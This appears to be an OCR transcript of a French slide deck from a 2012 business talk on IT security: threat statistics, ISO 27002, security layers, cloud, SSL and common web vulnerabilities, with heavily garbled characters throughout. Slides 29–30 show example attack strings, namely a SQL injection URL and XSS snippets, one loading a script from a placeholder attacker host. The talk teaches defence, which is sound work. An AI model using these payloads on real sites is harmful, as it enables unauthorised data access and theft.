ict | la sécurité it par philippe monfils et bruno mairlot | liege creative, 30.05.12
DESCRIPTION
La sécurité informatique recouvre un vaste domaine. Que ce soit au niveau du datacenter, en transit, sur vos postes de travail, via vos appareils mobiles ou encore en mode cloud, vos données doivent être protégées en continu. Mais il n'est pas toujours évident de gérer et de choisir les bons outils pour y parvenir. Quelques règles élémentaires de bonnes pratiques peuvent pourtant garantir à votre entreprise sa stabilité informatique.TRANSCRIPT
![Page 1: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/1.jpg)
Parole d’expert
Philippe MONFILS - ComputerLand SLM
Bruno MAIRLOT - Maehdros
Une organisation conjointe avec Café Numérique
La sécurité IT - Une précaution vitale pour votre entreprise
![Page 2: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/2.jpg)
Avec le soutien de :
![Page 3: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/3.jpg)
![Page 4: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/4.jpg)
� Début des années 2000, la cybercriminalité n’a pas cessé de se développer
� Le marché de la sécurité informatique est devenu l’un des secteurs les plus dynamiques de l’industrie IT
� les entreprises ont multiplié par trois la somme consacrée à la sécurité informatique en l’espace de six ans › Une société emploie désormais plus de 7 % de son
budget informatique dans la sécurité contre seulement 2 % en 2002.
› À l’heure actuelle, 55 % des entreprises ont une politique de sécurité documentée, contre 27 % en 2002
![Page 5: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/5.jpg)
� Sur base d’une étude de Symantec, 70 % des entreprises en France ont été victimes d’une attaque informatique au cours des douze derniers mois
� 21 % des entreprises assurent constater une augmentation de la fréquence d’attaque, contre 29 % en 2010
� Cependant 92 % des entreprises estiment avoir subi des pertes à la suite à des attaques contre
100 % en 2009
![Page 6: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/6.jpg)
� Une entreprise sécurisée préserve sa réputation
� Une sécurité garantie peut devenir un argument de vente
� Une sécurité inadaptée annule les avantages de la technologie
� Difficiles à quantifier !
![Page 7: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/7.jpg)
� La sécurité des systèmes d’information ou SSI › l’ensemble des moyens techniques, organisationnels, juridiques et humains
nécessaires et mis en place pour conserver, rétablir, et garantir la sécurité du système d'information »
› Mise en place d’une politique de sécurité des systèmes d’information PSSI
� ISO/CEI 27002 › L’ISO/CEI 27002 (anciennement ISO 17799) décrit les règles de bonnes pratiques
� Risk assessment › L’évaluation du risque ou « risk assessment » doit être réalisée pour déterminer les
actions afin de réduire et de maintenir le risque à un niveau acceptable › Le risque n’est pas nécessairement lié à l’informatique. L’aspect social ou humain
est critique. › La gestion du risque consiste idéalement à :
� Choisir la méthode d’évaluation du risque adaptée à l’entreprise � Définir les critères d’identification des risques
› Les méthodologies les plus connues : MEHARI & OCTAVE
![Page 8: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/8.jpg)
� La confidentialité : garantit que l’information est seulement accessible à ceux qui ont l’autorisation d’y accéder
� L’intégrité : représente la garantie que les données n’ont pas été modifiées, qu’elles sont complètes et précises
� La disponibilité : désigne la garantie du bon fonctionnement du système d'information
� L’authentification : S’assure que seules les personnes ayant le droit d’accéder aux informations puissent disposer des informations
� La non-répudiation : Elle permet de garantir qu'une transaction ne peut être niée ou contestée
![Page 9: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/9.jpg)
![Page 10: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/10.jpg)
� La couche physique › La gestion du courant, du refroidissement, des contrôles d’accès › Vidéosurveillance › Procédures en cas d’incendie ou d’inondation › La mise en place d’une solution de rechange en cas de perte totale
� La couche réseau › Configuration des routeurs, switches, Access Points WiFi, … › Détection et prévention des intrusions (IDS / IPS) › Firewall › Accès distants - VPN › Téléphonie IP › Service DNS › 802.1X, NAC / NAP
� La couche virtualisation › Règles de sécurité lors de la conception des machines virtuelles › Application d’un antimalware au niveau de la couche de virtualisation
![Page 11: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/11.jpg)
� La couche OS et applications › Mise à jour des updates de l’OS › Mise à jour des applications › Antivirus › Firewall › HIDS › Antispam › Filtrage WEB
� La couche données › Les grands principes d’un DRP › De la mise en place d’un DRP › De citer les grandes techniques utilisées
![Page 12: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/12.jpg)
� La couche utilisateurs › Politique de gestions des mots de passe › Authentification forte › Signature des documents › Signature et encryption des emails › Chiffrement des disques durs et lecteurs externes › Protection pour appareils mobiles › Charte des règles de bonne conduite
� La couche audit et management › Check-list d’évaluation › Test de pénétration en externe › Test de pénétration en interne › Surveillance de l’Active Directory › Inventaire du parc informatique › Collecte d’information (inventaire)
![Page 13: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/13.jpg)
� Le Cloud Computing consiste à déporter des services, des stockages ou des traitements informatiques traditionnellement localisés sur des serveurs locaux sur des serveurs distants
� Avantages : › Haute disponibilité › Sécurité › Accessibilité › Évolutivité › Simplicité › Modèle locatif › Réduction et maitrise des coûts
![Page 14: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/14.jpg)
� Catégorie 1 : Services Backup & DRP � Catégorie 2 : Web hosting � Catégorie 3 : Messagerie � Catégorie 4 : Infrastructure
![Page 15: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/15.jpg)
Network – Firewall Network – Wireless
Applications – Antivirus Applications – Firewall
Applications –Antispyware
Applications - Anti spam OS – Mises à jour
Applications – Mise à jour
SILVER
Audit Audit de code + Audit de vulnérabilité + Audit de configuration
Evaluation des risques
GOLD
PLATINUM
Sécurité switches Sécurité routeurs Gestion 802.1X Gestion VPN
IWS – Web Filtrering Plan DRP
Encryption email Signature email Signature PDF
Mobile Security
Gestion salle serveur IDS / IPS
Sécurité switches Sécurité routeurs
Téléphonie Secure DNS
Deep Security Authentification forte
Chiffrement des disques Mobile Security
Règles virtualisation Authentification forte
Gestion 802.1X Infrastructure NAC / NAP
IWS – Web Filtering Intrusion Defense Firewall
DLP -> Data Loss Prevention Plan DRP
Signature PDF Gestion des mots de passe
Simple
Evaluation des risques Avancée
![Page 16: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/16.jpg)
MAEHDROS Internet Services
Bruno Mairlot Gérant et fondateur de MAEHDROS Spécialiste en hos<ng et connec<vité
Sécurité des données et des systèmes hébergés
Twi6er: @bmairlot LinkedIn: brunomairlot
![Page 17: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/17.jpg)
Défini@ons
• Un système est sécurisé lorsqu’il se comporte comme a@endu, à savoir : – Lorsqu’il est disponible – Lorsqu’il est intègre – Lorsque sa confiden@alité est garan@e
![Page 18: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/18.jpg)
Objec@fs
• Les a6aquants peuvent être de plusieurs natures et u@liser différentes méthodes. Les buts recherchés peuvent être de deux types : – Financier – Notoriété et/ou idéalisme
![Page 19: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/19.jpg)
Objec@fs financiers
• Le vol d’informa@on sensible (comptabilité, liste de client, brevets, codes informa@ques,…)
• Le vol d’informa@on directement financière comme les numéro de carte de crédit
![Page 20: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/20.jpg)
Objec@fs notoriété / idées
• Volonté de nuire à un concurrent ou une société honnie (cf l’a6aque du Sony Playsta@on Network, près de 100 millions d’u@lisateur)
• A6aque des sites gouvernementaux (cf l’a6aque par Anonymous du site de la police espagnole)
• Volonté de montrer son savoir-‐faire
![Page 21: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/21.jpg)
L’externalisa@on est-‐elle une solu@on ?
• En soi, l’externalisa@on n’est pas la solu@on, mais elle fait par@e des éléments à me6re en place pour une bonne défense car elle permet de : – restreindre le périmètre d’ac@on – Augmenter le rapport contraintes sur la sécurité/confort (par coercicion)
– Déléguer la tâche de protec@on des données sensibles
![Page 22: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/22.jpg)
Les désavantages de l’externalisa@on
• En général, sur un réseau hébergé, la bande passante accessible aux infrastructures est sensiblement supérieure (parfois jusqu’à un facteur 1000) et permet donc d’a6aquer beaucoup plus rapidement.
• Cela peut toutefois être un avantage face à un a6aquant isolé
• Il y a des risques de dommages collatéraux (p. ex. une a6aque sur le cloud d’Amazon a6eindrait tous ses clients)
![Page 23: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/23.jpg)
Cer@ficat SSL
• Les cer@ficats SSL sont conçus pour deux objec@fs : authen<fier le site que vous visitez et protéger vos données (notamment les données d’accès)
• Accessoirement un cer@ficat peut être u@lisé pour authen@fier le client
• Il est important de vérifier l’URL et l’éme6eur du cer@ficat.
![Page 24: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/24.jpg)
Cer@ficat SSL
![Page 25: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/25.jpg)
IPv6
• Dans le monde IPv6, tous les appareils seront connectés directement à Internet, sans passer par un Nat et parfois sans firewall (mobile)
• Il seront d’autant plus vulnérables s’ils ne sont pas à jour et protégés correctement
![Page 26: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/26.jpg)
Vulnérabilités des sites web • Injec@on • Cross-‐Site Scrip@ng • Authen@fica@on et Session • Insecure Object Reference • Cross-‐Site Forged Request • Configura@on de la sécurité incorrecte • Stockage non sécurisé (credit card number,…) • Restric@on d’URL mal implémentée • Cryptographie mal u@lisée ou incomprise
![Page 27: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/27.jpg)
Parades
• Mises à jour des applica@ons et des systèmes, protec@on contre la rétro-‐ingénierie
• Détec@on et préven@on d’intrusion • Educa@on et sensibilisa@on des u@lisateurs • Authen@fica@on et Autorisa@on • Protec@on par cryptographie (symétrique et/ou assymétrique)
![Page 28: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/28.jpg)
Exemples : Injec@on
• Injec@on de code exécutable via les zones d’upload (via HTTP ou FTP) et ré-‐exécu@on de ces codes.
• Protec@on : U@liser des zones non couvertes par des URLs et accéder à ces URLs uniquement via des scripts sécurisés. – h6p://.../uploads/profil1000.jpg : Wrong – h6p://.../getUpload/?profilID=1000.jpg : Be6er
![Page 29: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/29.jpg)
Exemples : Injec@on • URL basique :
– h6p://mon.site/viewProfil/?id=1 • L’a6aquant remplace ‘1’ => ‘1 or 1=1’ • URL forgée :
– h6p://mon.site/viewProfil/?id=1 or 1=1 • La query SQL est alors valide pour toutes les lignes de la
table. Il est alors possible d’accéder à n’importe quel profil • N’importe quel code SQL peut alors être injecté derrière ce
‘1=1’ • Protec@on : Valider et Vérifier les URLs et les paramètres
de manière systéma<que
![Page 30: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/30.jpg)
Exemples : XSS
• Généralement les injec@ons amènent à produire des scripts Javascript pour effectuer toute une série de commande via d’autres sites.
• <script src=‘h6p://hackersite.ru/[email protected]’></script>
• <body onload=‘alert() ’> • <img onerror=‘…’>
![Page 31: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/31.jpg)
Recommanda@ons globales • Installa@on d’une passerelle filtrante en amont des serveurs
• Détec@on d’un (trop) grand nombre de requêtes/session TCP d’un même host
• Verrouillage read-‐only des codes • U@lisa@on de méthodes sécurisées pour le déploiement des nouveaux codes et nouvelles version
• Eviter les hébergements mutualisés (car manque de contrôle)
![Page 32: ICT | La sécurité IT par Philippe Monfils et Bruno Mairlot | Liege Creative, 30.05.12](https://reader035.vdocuments.pub/reader035/viewer/2022062617/54bea3a44a795902438b45ce/html5/thumbnails/32.jpg)
Merci pour votre a6en@on.